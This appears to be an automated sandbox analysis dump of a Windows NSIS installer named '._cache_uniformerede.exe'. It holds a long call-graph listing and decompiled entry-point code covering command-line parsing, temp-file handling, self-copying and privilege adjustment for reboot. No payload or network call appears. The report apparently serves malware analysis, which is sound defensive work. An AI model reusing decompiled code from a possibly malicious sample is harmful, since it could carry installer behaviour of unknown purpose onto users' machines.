4016b6 5323->5324 5324->5325 5326 406428 36 API calls 5324->5326 5326->5320 5641 687e2d43 5642 687e2d5b 5641->5642 5643 687e162f 2 API calls 5642->5643 5644 687e2d76 5643->5644 5652 4022ff 5653 402da6 17 API calls 5652->5653 5654 402305 5653->5654 5655 402da6 17 API calls 5654->5655 5656 40230e 5655->5656 5657 402da6 17 API calls 5656->5657 5658 402317 5657->5658 5659 40699e 2 API calls 5658->5659 5660 402320 5659->5660 5661 402331 lstrlenW lstrlenW 5660->5661 5662 402324 5660->5662 5664 4056ca 24 API calls 5661->5664 5663 4056ca 24 API calls 5662->5663 5666 40232c 5662->5666 5663->5666 5665 40236f SHFileOperationW 5664->5665 5665->5662 5665->5666 5667 4019ff 5668 402da6 17 API calls 5667->5668 5669 401a06 5668->5669 5670 402da6 17 API calls 5669->5670 5671 401a0f 5670->5671 5672 401a16 lstrcmpiW 5671->5672 5673 401a28 lstrcmpW 5671->5673 5674 401a1c 5672->5674 5673->5674 5675 401000 5676 401037 BeginPaint GetClientRect 5675->5676 5677 40100c DefWindowProcW 5675->5677 5678 4010f3 5676->5678 5682 401179 5677->5682 5680 401073 CreateBrushIndirect FillRect DeleteObject 5678->5680 5681 4010fc 5678->5681 5680->5678 5683 401102 CreateFontIndirectW 5681->5683 5684 401167 EndPaint 5681->5684 5683->5684 5685 401112 6 API calls 5683->5685 5684->5682 5685->5684 5686 401d81 5687 401d94 GetDlgItem 5686->5687 5688 401d87 5686->5688 5690 401d8e 5687->5690 5689 402d84 17 API calls 5688->5689 5689->5690 5691 401dd5 GetClientRect LoadImageW SendMessageW 5690->5691 5693 402da6 17 API calls 5690->5693 5694 401e33 5691->5694 5696 401e3f 5691->5696 5693->5691 5695 401e38 DeleteObject 5694->5695 5694->5696 5695->5696 5697 687e103d 5700 687e101b 5697->5700 5701 687e15b6 GlobalFree 5700->5701 5702 687e1020 5701->5702 5703 687e1027 GlobalAlloc 5702->5703 5704 687e1024 5702->5704 5703->5704 5705 687e15dd 3 API calls 5704->5705 5706 687e103b 5705->5706 5707 401503 5708 40150b 5707->5708 5710 40151e 5707->5710 5709 402d84 17 API calls 5708->5709 5709->5710 5711 404783 5715 4048b5 5711->5715 
5716 40479b 5711->5716 5712 40491f 5713 4049e9 5712->5713 5714 404929 GetDlgItem 5712->5714 5721 40462b 8 API calls 5713->5721 5718 404943 5714->5718 5719 4049aa 5714->5719 5715->5712 5715->5713 5722 4048f0 GetDlgItem SendMessageW 5715->5722 5717 4045c4 18 API calls 5716->5717 5720 404802 5717->5720 5718->5719 5726 404969 SendMessageW LoadCursorW SetCursor 5718->5726 5719->5713 5727 4049bc 5719->5727 5724 4045c4 18 API calls 5720->5724 5725 4049e4 5721->5725 5744 4045e6 KiUserCallbackDispatcher 5722->5744 5729 40480f CheckDlgButton 5724->5729 5748 404a32 5726->5748 5731 4049d2 5727->5731 5732 4049c2 SendMessageW 5727->5732 5728 40491a 5745 404a0e 5728->5745 5742 4045e6 KiUserCallbackDispatcher 5729->5742 5731->5725 5736 4049d8 SendMessageW 5731->5736 5732->5731 5736->5725 5737 40482d GetDlgItem 5743 4045f9 SendMessageW 5737->5743 5739 404843 SendMessageW 5740 404860 GetSysColor 5739->5740 5741 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5739->5741 5740->5741 5741->5725 5742->5737 5743->5739 5744->5728 5746 404a21 SendMessageW 5745->5746 5747 404a1c 5745->5747 5746->5712 5747->5746 5751 405c8e ShellExecuteExW 5748->5751 5750 404998 LoadCursorW SetCursor 5750->5719 5751->5750 5752 402383 5753 40238a 5752->5753 5756 40239d 5752->5756 5754 4066a5 17 API calls 5753->5754 5755 402397 5754->5755 5755->5756 5757 405cc8 MessageBoxIndirectW 5755->5757 5757->5756 5758 402c05 SendMessageW 5759 402c2a 5758->5759 5760 402c1f InvalidateRect 5758->5760 5760->5759 4915 405809 4916 4059b3 4915->4916 4917 40582a GetDlgItem GetDlgItem GetDlgItem 4915->4917 4919 4059e4 4916->4919 4920 4059bc GetDlgItem CreateThread FindCloseChangeNotification 4916->4920 4961 4045f9 SendMessageW 4917->4961 4922 405a0f 4919->4922 4923 405a34 4919->4923 4924 4059fb ShowWindow ShowWindow 4919->4924 4920->4919 4964 40579d 5 API calls 4920->4964 4921 40589a 4927 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4921->4927 4925 405a1b 4922->4925 4926 405a6f 4922->4926 
4931 40462b 8 API calls 4923->4931 4963 4045f9 SendMessageW 4924->4963 4929 405a23 4925->4929 4930 405a49 ShowWindow 4925->4930 4926->4923 4937 405a7d SendMessageW 4926->4937 4935 4058f3 SendMessageW SendMessageW 4927->4935 4936 40590f 4927->4936 4938 40459d SendMessageW 4929->4938 4933 405a69 4930->4933 4934 405a5b 4930->4934 4932 405a42 4931->4932 4940 40459d SendMessageW 4933->4940 4939 4056ca 24 API calls 4934->4939 4935->4936 4941 405922 4936->4941 4942 405914 SendMessageW 4936->4942 4937->4932 4943 405a96 CreatePopupMenu 4937->4943 4938->4923 4939->4933 4940->4926 4945 4045c4 18 API calls 4941->4945 4942->4941 4944 4066a5 17 API calls 4943->4944 4946 405aa6 AppendMenuW 4944->4946 4947 405932 4945->4947 4948 405ac3 GetWindowRect 4946->4948 4949 405ad6 TrackPopupMenu 4946->4949 4950 40593b ShowWindow 4947->4950 4951 40596f GetDlgItem SendMessageW 4947->4951 4948->4949 4949->4932 4953 405af1 4949->4953 4954 405951 ShowWindow 4950->4954 4955 40595e 4950->4955 4951->4932 4952 405996 SendMessageW SendMessageW 4951->4952 4952->4932 4956 405b0d SendMessageW 4953->4956 4954->4955 4962 4045f9 SendMessageW 4955->4962 4956->4956 4957 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4956->4957 4959 405b4f SendMessageW 4957->4959 4959->4959 4960 405b78 GlobalUnlock SetClipboardData CloseClipboard 4959->4960 4960->4932 4961->4921 4962->4951 4963->4922 4982 40248a 4983 402da6 17 API calls 4982->4983 4984 40249c 4983->4984 4985 402da6 17 API calls 4984->4985 4986 4024a6 4985->4986 4999 402e36 4986->4999 4989 402c2a 4990 4024de 4992 4024ea 4990->4992 4994 402d84 17 API calls 4990->4994 4991 402da6 17 API calls 4993 4024d4 lstrlenW 4991->4993 4995 402509 RegSetValueExW 4992->4995 4996 403371 44 API calls 4992->4996 4993->4990 4994->4992 4997 40251f RegCloseKey 4995->4997 4996->4995 4997->4989 5000 402e51 4999->5000 5003 406503 5000->5003 5004 406512 5003->5004 5005 4024b6 5004->5005 5006 40651d RegCreateKeyExW 5004->5006 5005->4989 5005->4990 5005->4991 5006->5005 
5023 40290b 5024 402da6 17 API calls 5023->5024 5025 402912 FindFirstFileW 5024->5025 5026 40293a 5025->5026 5029 402925 5025->5029 5027 402943 5026->5027 5031 4065af wsprintfW 5026->5031 5032 406668 lstrcpynW 5027->5032 5031->5027 5032->5029 5761 404e0b 5762 404e37 5761->5762 5763 404e1b 5761->5763 5764 404e6a 5762->5764 5765 404e3d SHGetPathFromIDListW 5762->5765 5772 405cac GetDlgItemTextW 5763->5772 5767 404e4d 5765->5767 5771 404e54 SendMessageW 5765->5771 5769 40140b 2 API calls 5767->5769 5768 404e28 SendMessageW 5768->5762 5769->5771 5771->5764 5772->5768 5773 40190c 5774 401943 5773->5774 5775 402da6 17 API calls 5774->5775 5776 401948 5775->5776 5777 405d74 67 API calls 5776->5777 5778 401951 5777->5778 5779 40190f 5780 402da6 17 API calls 5779->5780 5781 401916 5780->5781 5782 405cc8 MessageBoxIndirectW 5781->5782 5783 40191f 5782->5783 5784 401491 5785 4056ca 24 API calls 5784->5785 5786 401498 5785->5786 5787 402891 5788 402898 5787->5788 5790 402ba9 5787->5790 5789 402d84 17 API calls 5788->5789 5791 40289f 5789->5791 5792 4028ae SetFilePointer 5791->5792 5792->5790 5793 4028be 5792->5793 5795 4065af wsprintfW 5793->5795 5795->5790 5796 401f12 5797 402da6 17 API calls 5796->5797 5798 401f18 5797->5798 5799 402da6 17 API calls 5798->5799 5800 401f21 5799->5800 5801 402da6 17 API calls 5800->5801 5802 401f2a 5801->5802 5803 402da6 17 API calls 5802->5803 5804 401f33 5803->5804 5805 401423 24 API calls 5804->5805 5806 401f3a 5805->5806 5813 405c8e ShellExecuteExW 5806->5813 5808 401f82 5809 406ae0 5 API calls 5808->5809 5810 40292e 5808->5810 5811 401f9f CloseHandle 5809->5811 5811->5810 5813->5808 5814 402f93 5815 402fa5 SetTimer 5814->5815 5816 402fbe 5814->5816 5815->5816 5817 40300c 5816->5817 5818 403012 MulDiv 5816->5818 5819 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 5818->5819 5819->5817 5835 401d17 5836 402d84 17 API calls 5835->5836 5837 401d1d IsWindow 5836->5837 5838 401a20 5837->5838 5839 687e27a4 5840 687e2808 5839->5840 5841 687e27b2 
VirtualAlloc 5839->5841 5841->5840 5842 401b9b 5843 401bec 5842->5843 5844 401ba8 5842->5844 5846 401bf1 5843->5846 5847 401c16 GlobalAlloc 5843->5847 5845 401c31 5844->5845 5850 401bbf 5844->5850 5848 4066a5 17 API calls 5845->5848 5855 40239d 5845->5855 5846->5855 5863 406668 lstrcpynW 5846->5863 5849 4066a5 17 API calls 5847->5849 5851 402397 5848->5851 5849->5845 5861 406668 lstrcpynW 5850->5861 5851->5855 5857 405cc8 MessageBoxIndirectW 5851->5857 5854 401c03 GlobalFree 5854->5855 5856 401bce 5862 406668 lstrcpynW 5856->5862 5857->5855 5859 401bdd 5864 406668 lstrcpynW 5859->5864 5861->5856 5862->5859 5863->5854 5864->5855 5865 40261c 5866 402da6 17 API calls 5865->5866 5867 402623 5866->5867 5870 406158 GetFileAttributesW CreateFileW 5867->5870 5869 40262f 5870->5869 5341 40259e 5342 402de6 17 API calls 5341->5342 5343 4025a8 5342->5343 5344 402d84 17 API calls 5343->5344 5345 4025b1 5344->5345 5346 4025d9 RegEnumValueW 5345->5346 5347 4025cd RegEnumKeyW 5345->5347 5350 40292e 5345->5350 5348 4025f5 RegCloseKey 5346->5348 5349 4025ee 5346->5349 5347->5348 5348->5350 5349->5348 5878 40149e 5879 4014ac PostQuitMessage 5878->5879 5880 40239d 5878->5880 5879->5880 4794 4015a3 4795 402da6 17 API calls 4794->4795 4796 4015aa SetFileAttributesW 4795->4796 4797 4015bc 4796->4797 4798 401fa4 4799 402da6 17 API calls 4798->4799 4800 401faa 4799->4800 4801 4056ca 24 API calls 4800->4801 4802 401fb4 4801->4802 4803 405c4b 2 API calls 4802->4803 4804 401fba 4803->4804 4805 401fdd CloseHandle 4804->4805 4808 40292e 4804->4808 4813 406ae0 WaitForSingleObject 4804->4813 4805->4808 4809 401fcf 4810 401fd4 4809->4810 4811 401fdf 4809->4811 4818 4065af wsprintfW 4810->4818 4811->4805 4814 406afa 4813->4814 4815 406b0c GetExitCodeProcess 4814->4815 4816 406a71 2 API calls 4814->4816 4815->4809 4817 406b01 WaitForSingleObject 4816->4817 4817->4814 4818->4805 4965 40252a 4976 402de6 4965->4976 4968 402da6 17 API calls 4969 40253d 4968->4969 4970 402548 RegQueryValueExW 4969->4970 
4974 40292e 4969->4974 4971 40256e RegCloseKey 4970->4971 4972 402568 4970->4972 4971->4974 4972->4971 4981 4065af wsprintfW 4972->4981 4977 402da6 17 API calls 4976->4977 4978 402dfd 4977->4978 4979 4064d5 RegOpenKeyExW 4978->4979 4980 402534 4979->4980 4980->4968 4981->4971 5007 4021aa 5008 402da6 17 API calls 5007->5008 5009 4021b1 5008->5009 5010 402da6 17 API calls 5009->5010 5011 4021bb 5010->5011 5012 402da6 17 API calls 5011->5012 5013 4021c5 5012->5013 5014 402da6 17 API calls 5013->5014 5015 4021cf 5014->5015 5016 402da6 17 API calls 5015->5016 5017 4021d9 5016->5017 5018 402218 CoCreateInstance 5017->5018 5019 402da6 17 API calls 5017->5019 5022 402237 5018->5022 5019->5018 5020 401423 24 API calls 5021 4022f6 5020->5021 5022->5020 5022->5021 5881 40202a 5882 402da6 17 API calls 5881->5882 5883 402031 5882->5883 5884 406a35 5 API calls 5883->5884 5885 402040 5884->5885 5886 4020cc 5885->5886 5887 40205c GlobalAlloc 5885->5887 5887->5886 5888 402070 5887->5888 5889 406a35 5 API calls 5888->5889 5890 402077 5889->5890 5891 406a35 5 API calls 5890->5891 5892 402081 5891->5892 5892->5886 5896 4065af wsprintfW 5892->5896 5894 4020ba 5897 4065af wsprintfW 5894->5897 5896->5894 5897->5886 5905 401a30 5906 402da6 17 API calls 5905->5906 5907 401a39 ExpandEnvironmentStringsW 5906->5907 5908 401a4d 5907->5908 5910 401a60 5907->5910 5909 401a52 lstrcmpW 5908->5909 5908->5910 5909->5910 5911 405031 GetDlgItem GetDlgItem 5912 405083 7 API calls 5911->5912 5918 4052a8 5911->5918 5913 40512a DeleteObject 5912->5913 5914 40511d SendMessageW 5912->5914 5915 405133 5913->5915 5914->5913 5916 40516a 5915->5916 5919 4066a5 17 API calls 5915->5919 5920 4045c4 18 API calls 5916->5920 5917 40538a 5921 405436 5917->5921 5931 4053e3 SendMessageW 5917->5931 5951 40529b 5917->5951 5918->5917 5926 405317 5918->5926 5965 404f7f SendMessageW 5918->5965 5924 40514c SendMessageW SendMessageW 5919->5924 5925 40517e 5920->5925 5922 405440 SendMessageW 5921->5922 5923 405448 5921->5923 
5922->5923 5933 405461 5923->5933 5934 40545a ImageList_Destroy 5923->5934 5941 405471 5923->5941 5924->5915 5930 4045c4 18 API calls 5925->5930 5926->5917 5927 40537c SendMessageW 5926->5927 5927->5917 5928 40462b 8 API calls 5932 405637 5928->5932 5945 40518f 5930->5945 5936 4053f8 SendMessageW 5931->5936 5931->5951 5937 40546a GlobalFree 5933->5937 5933->5941 5934->5933 5935 4055eb 5942 4055fd ShowWindow GetDlgItem ShowWindow 5935->5942 5935->5951 5939 40540b 5936->5939 5937->5941 5938 40526a GetWindowLongW SetWindowLongW 5940 405283 5938->5940 5950 40541c SendMessageW 5939->5950 5943 4052a0 5940->5943 5944 405288 ShowWindow 5940->5944 5941->5935 5956 4054ac 5941->5956 5970 404fff 5941->5970 5942->5951 5964 4045f9 SendMessageW 5943->5964 5963 4045f9 SendMessageW 5944->5963 5945->5938 5946 405265 5945->5946 5949 4051e2 SendMessageW 5945->5949 5952 405220 SendMessageW 5945->5952 5953 405234 SendMessageW 5945->5953 5946->5938 5946->5940 5949->5945 5950->5921 5951->5928 5952->5945 5953->5945 5955 4055b6 5957 4055c1 InvalidateRect 5955->5957 5960 4055cd 5955->5960 5958 4054da SendMessageW 5956->5958 5959 4054f0 5956->5959 5957->5960 5958->5959 5959->5955 5961 405564 SendMessageW SendMessageW 5959->5961 5960->5935 5979 404f3a 5960->5979 5961->5959 5963->5951 5964->5918 5966 404fa2 GetMessagePos ScreenToClient SendMessageW 5965->5966 5967 404fde SendMessageW 5965->5967 5968 404fd6 5966->5968 5969 404fdb 5966->5969 5967->5968 5968->5926 5969->5967 5982 406668 lstrcpynW 5970->5982 5972 405012 5983 4065af wsprintfW 5972->5983 5974 40501c 5975 40140b 2 API calls 5974->5975 5976 405025 5975->5976 5984 406668 lstrcpynW 5976->5984 5978 40502c 5978->5956 5985 404e71 5979->5985 5981 404f4f 5981->5935 5982->5972 5983->5974 5984->5978 5986 404e8a 5985->5986 5987 4066a5 17 API calls 5986->5987 5988 404eee 5987->5988 5989 4066a5 17 API calls 5988->5989 5990 404ef9 5989->5990 5991 4066a5 17 API calls 5990->5991 5992 404f0f lstrlenW wsprintfW SetDlgItemTextW 5991->5992 5992->5981 

Control-flow Graph (legend: Executed, Not Executed; graph starts at block 403640-403690)
C-Code - Quality: 79%
_entry_() {
	WCHAR* _v8;
	signed int _v12;
	void* _v16;
	signed int _v20;
	int _v24;
	int _v28;
	struct _TOKEN_PRIVILEGES _v40;
	signed char _v42;
	int _v44;
	signed int _v48;
	intOrPtr _v278;
	signed short _v310;
	struct _OSVERSIONINFOW _v324;
	struct _SHFILEINFOW _v1016;
	intOrPtr* _t88;
	WCHAR* _t92;
	char* _t94;
	void _t97;
	void* _t116;
	WCHAR* _t118;
	signed int _t120;
	intOrPtr* _t124;
	void* _t138;
	void* _t144;
	void* _t149;
	void* _t153;
	void* _t158;
	signed int _t168;
	void* _t171;
	void* _t176;
	intOrPtr _t178;
	intOrPtr _t179;
	intOrPtr* _t180;
	int _t189;
	void* _t190;
	void* _t199;
	signed int _t205;
	signed int _t210;
	signed int _t215;
	signed int _t217;
	int* _t219;
	signed int _t227;
	signed int _t230;
	CHAR* _t232;
	char* _t233;
	signed int _t234;
	WCHAR* _t235;
	void* _t251;

	_t217 = 0x20;
	_t189 = 0;
	_v24 = 0;
	_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
	_v20 = 0;
	SetErrorMode(0x8001); // executed
	_v324.szCSDVersion = 0;
	_v48 = 0;
	_v44 = 0;
	_v324.dwOSVersionInfoSize = 0x11c;
	if(GetVersionExW( &_v324) == 0) {
		_v324.dwOSVersionInfoSize = 0x114;
		GetVersionExW( &_v324);
		asm("sbb eax, eax");
		_v42 = 4;
		_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
	}
	if(_v324.dwMajorVersion < 0xa) {
		_v310 = _v310 & 0x00000000;
	}
	 *0x42a318 = _v324.dwBuildNumber;
	 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
	if( *0x42a31e != 0x600) {
		_t180 = E00406A35(_t189);
		if(_t180 != _t189) {
			 *_t180(0xc00);
		}
	}
	_t232 = "UXTHEME";
	do {
		E004069C5(_t232); // executed
		_t232 =  &(_t232[lstrlenA(_t232) + 1]);
	} while ( *_t232 != 0);
	E00406A35(0xb);
	 *0x42a264 = E00406A35(9);
	_t88 = E00406A35(7);
	if(_t88 != _t189) {
		_t88 =  *_t88(0x1e);
		if(_t88 != 0) {
			 *0x42a31c =  *0x42a31c | 0x00000080;
		}
	}
	__imp__#17();
	__imp__OleInitialize(_t189); // executed
	 *0x42a320 = _t88;
	SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
	E00406668(0x429260, L"NSIS Error");
	_t92 = GetCommandLineW();
	_t233 = L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ";
	E00406668(_t233, _t92);
	_t94 = _t233;
	_t234 = 0x22;
	 *0x42a260 = 0x400000;
	_t251 = L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" " - _t234; // 0x22
	if(_t251 == 0) {
		_t217 = _t234;
		_t94 =  &M00435002;
	}
	_t199 = CharNextW(E00405F64(_t94, _t217));
	_v16 = _t199;
	while(1) {
		_t97 =  *_t199;
		_t252 = _t97 - _t189;
		if(_t97 == _t189) {
			break;
		}
		_t210 = 0x20;
		__eflags = _t97 - _t210;
		if(_t97 != _t210) {
                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                            						__eflags =  *_t199 - _t234;
                                                                                                                                                                                                                            						_v12 = _t210;
                                                                                                                                                                                                                            						if( *_t199 == _t234) {
                                                                                                                                                                                                                            							_v12 = _t234;
                                                                                                                                                                                                                            							_t199 = _t199 + 2;
                                                                                                                                                                                                                            							__eflags = _t199;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *_t199 - 0x2f;
                                                                                                                                                                                                                            						if( *_t199 != 0x2f) {
                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                            							_t199 = E00405F64(_t199, _v12);
                                                                                                                                                                                                                            							__eflags =  *_t199 - _t234;
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								_t199 = _t199 + 2;
                                                                                                                                                                                                                            								__eflags = _t199;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t199 = _t199 + 2;
                                                                                                                                                                                                                            							__eflags =  *_t199 - 0x53;
                                                                                                                                                                                                                            							if( *_t199 != 0x53) {
                                                                                                                                                                                                                            								L24:
                                                                                                                                                                                                                            								asm("cdq");
                                                                                                                                                                                                                            								asm("cdq");
                                                                                                                                                                                                                            								_t215 = L"NCRC" & 0x0000ffff;
                                                                                                                                                                                                                            								asm("cdq");
                                                                                                                                                                                                                            								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
                                                                                                                                                                                                                            								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
                                                                                                                                                                                                                            								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                                                                                                                                                            									L29:
                                                                                                                                                                                                                            									asm("cdq");
                                                                                                                                                                                                                            									asm("cdq");
                                                                                                                                                                                                                            									_t210 = L" /D=" & 0x0000ffff;
                                                                                                                                                                                                                            									asm("cdq");
                                                                                                                                                                                                                            									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
                                                                                                                                                                                                                            									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
                                                                                                                                                                                                                            									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                            										_t234 = 0x22;
                                                                                                                                                                                                                            										goto L32;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags =  *_t199 - _t230;
                                                                                                                                                                                                                            									if( *_t199 == _t230) {
                                                                                                                                                                                                                            										 *(_t199 - 4) = _t189;
                                                                                                                                                                                                                            										__eflags = _t199;
                                                                                                                                                                                                                            										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t199);
                                                                                                                                                                                                                            										L37:
                                                                                                                                                                                                                            										_t235 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                                                                                                                                                                            										GetTempPathW(0x400, _t235);
                                                                                                                                                                                                                            										_t116 = E0040360F(_t199, _t252);
                                                                                                                                                                                                                            										_t253 = _t116;
                                                                                                                                                                                                                            										if(_t116 != 0) {
                                                                                                                                                                                                                            											L40:
                                                                                                                                                                                                                            											DeleteFileW(L"1033"); // executed
                                                                                                                                                                                                                            											_t118 = E004030D0(_t255, _v20); // executed
                                                                                                                                                                                                                            											_v8 = _t118;
                                                                                                                                                                                                                            											if(_t118 != _t189) {
                                                                                                                                                                                                                            												L68:
                                                                                                                                                                                                                            												E00403C25();
                                                                                                                                                                                                                            												__imp__OleUninitialize();
                                                                                                                                                                                                                            												if(_v8 == _t189) {
                                                                                                                                                                                                                            													if( *0x42a2f4 == _t189) {
                                                                                                                                                                                                                            														L77:
                                                                                                                                                                                                                            														_t120 =  *0x42a30c;
                                                                                                                                                                                                                            														if(_t120 != 0xffffffff) {
                                                                                                                                                                                                                            															_v24 = _t120;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														ExitProcess(_v24);
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                                                                                                                                                            														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                                                                                                                                                            														_v40.PrivilegeCount = 1;
                                                                                                                                                                                                                            														_v28 = 2;
                                                                                                                                                                                                                            														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													_t124 = E00406A35(4);
                                                                                                                                                                                                                            													if(_t124 == _t189) {
                                                                                                                                                                                                                            														L75:
                                                                                                                                                                                                                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                                                                                                                                                            															goto L77;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														goto L76;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														_push(0x80040002);
                                                                                                                                                                                                                            														_push(0x25);
                                                                                                                                                                                                                            														_push(_t189);
                                                                                                                                                                                                                            														_push(_t189);
                                                                                                                                                                                                                            														_push(_t189);
                                                                                                                                                                                                                            														if( *_t124() == 0) {
                                                                                                                                                                                                                            															L76:
                                                                                                                                                                                                                            															E0040140B(9);
                                                                                                                                                                                                                            															goto L77;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														goto L75;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												E00405CC8(_v8, 0x200010);
                                                                                                                                                                                                                            												ExitProcess(2);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											if( *0x42a27c == _t189) {
                                                                                                                                                                                                                            												L51:
                                                                                                                                                                                                                            												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                                                                                                                                                            												_v24 = E00403D17(_t265);
                                                                                                                                                                                                                            												goto L68;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t219 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ", _t189);
                                                                                                                                                                                                                            											if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ") {
                                                                                                                                                                                                                            												L48:
                                                                                                                                                                                                                            												_t264 = _t219 - L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ";
                                                                                                                                                                                                                            												_v8 = L"Error launching installer";
                                                                                                                                                                                                                            												if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ") {
                                                                                                                                                                                                                            													_t190 = E00405C33(__eflags);
                                                                                                                                                                                                                            													lstrcatW(_t235, L"~nsu");
                                                                                                                                                                                                                            													__eflags = _t190;
                                                                                                                                                                                                                            													if(_t190 != 0) {
                                                                                                                                                                                                                            														lstrcatW(_t235, "A");
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													lstrcatW(_t235, L".tmp");
                                                                                                                                                                                                                            													_t220 = L"C:\\Users\\hardz\\Desktop";
                                                                                                                                                                                                                            													_t138 = lstrcmpiW(_t235, L"C:\\Users\\hardz\\Desktop");
                                                                                                                                                                                                                            													__eflags = _t138;
                                                                                                                                                                                                                            													if(_t138 == 0) {
                                                                                                                                                                                                                            														L67:
                                                                                                                                                                                                                            														_t189 = 0;
                                                                                                                                                                                                                            														__eflags = 0;
                                                                                                                                                                                                                            														goto L68;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														__eflags = _t190;
                                                                                                                                                                                                                            														_push(_t235);
                                                                                                                                                                                                                            														if(_t190 == 0) {
                                                                                                                                                                                                                            															E00405C16();
                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                            															E00405B99();
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														SetCurrentDirectoryW(_t235);
                                                                                                                                                                                                                            														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                            															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t220);
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														E00406668(0x42b000, _v16);
                                                                                                                                                                                                                            														_t202 = "A" & 0x0000ffff;
                                                                                                                                                                                                                            														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                                                                                                                                            														__eflags = _t144;
                                                                                                                                                                                                                            														_v12 = 0x1a;
                                                                                                                                                                                                                            														 *0x42b800 = _t144;
                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                            															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                                                                                                                                                                            															DeleteFileW(0x420f08);
                                                                                                                                                                                                                            															__eflags = _v8;
                                                                                                                                                                                                                            															if(_v8 != 0) {
                                                                                                                                                                                                                            																_t149 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe", 0x420f08, 1);
                                                                                                                                                                                                                            																__eflags = _t149;
                                                                                                                                                                                                                            																if(_t149 != 0) {
                                                                                                                                                                                                                            																	E00406428(_t202, 0x420f08, 0);
                                                                                                                                                                                                                            																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                                                                                                                                                                            																	_t153 = E00405C4B(0x420f08);
                                                                                                                                                                                                                            																	__eflags = _t153;
                                                                                                                                                                                                                            																	if(_t153 != 0) {
                                                                                                                                                                                                                            																		CloseHandle(_t153);
                                                                                                                                                                                                                            																		_v8 = 0;
                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                            															 *0x42b800 =  *0x42b800 + 1;
                                                                                                                                                                                                                            															_t61 =  &_v12;
                                                                                                                                                                                                                            															 *_t61 = _v12 - 1;
                                                                                                                                                                                                                            															__eflags =  *_t61;
                                                                                                                                                                                                                            														} while ( *_t61 != 0);
                                                                                                                                                                                                                            														E00406428(_t202, _t235, 0);
                                                                                                                                                                                                                            														goto L67;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *_t219 = _t189;
                                                                                                                                                                                                                            												_t222 =  &(_t219[2]);
                                                                                                                                                                                                                            												_t158 = E0040603F(_t264,  &(_t219[2]));
                                                                                                                                                                                                                            												_t265 = _t158;
                                                                                                                                                                                                                            												if(_t158 == 0) {
                                                                                                                                                                                                                            													goto L68;
                                                                                                                                                                                                                            												}
